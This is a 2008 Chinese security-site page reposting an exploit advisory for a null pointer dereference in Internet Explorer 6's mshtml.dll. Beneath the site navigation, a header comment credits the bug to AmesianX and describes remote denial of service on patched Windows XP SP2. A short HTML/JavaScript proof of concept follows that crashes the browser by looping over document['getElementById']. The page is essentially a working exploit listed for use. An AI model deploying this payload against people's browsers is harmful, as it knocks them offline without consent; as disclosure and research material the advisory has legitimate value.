网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > Exploit > MS Internet Explorer 6 (mshtml.dll) Null Pointer Dereference Exploit  

MS Internet Explorer 6 (mshtml.dll) Null Pointer Dereference Exploit

2008-08-05  作者:bitsCN整理  来源:中国网管联盟  点评 投稿 收藏

<!--
+ Title: Microsoft Internet Explorer Malformed HTML Null Pointer Dereference Vulnerability (mshtml.dll) (0-day)

+ Bug discovered & exploit coded by AmesianX in powerhacker.net (YoungHo Park - amesianx@gmail.com)

+ Critical: Critical

+ Impact: MS Internet Explorer 6 -> Crash (Denial of Service)

+ Where: From remote

+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
                                          Windows 2000 Advanced Server (Korean Language)

+ Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server)
                            Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro) 网管bitscn_com

+ Solution: Not Patched (zero-day)

+ Description:
  The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched
  Windows XP SP2 system. this bug will crash when executing a 'for' scripts.

+ The following proof-of-concept is also available:
  http://www.powerhacker.net/exploit/IE_NULL_CRASH.html
-->

<html>
<head>
<title> AmesianX, RC_No1 in powerhacker.net (amesianx@gmail.com, RC_No1@gmail.com)</title>
</head>
<body>
<script language='javascript'>
var data = document['getElementById'];
for(var key in data);
</script>
</body>
</html>

TAGs         <   Windows   Explorer   Internet   SP2   in   Microsoft      
 上一篇:PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC   下一篇:IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)
MS Internet Explorer 6 (mshtml.dll) Null Pointer Dereference Exploit 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
最新推荐文章:
网管论坛交流: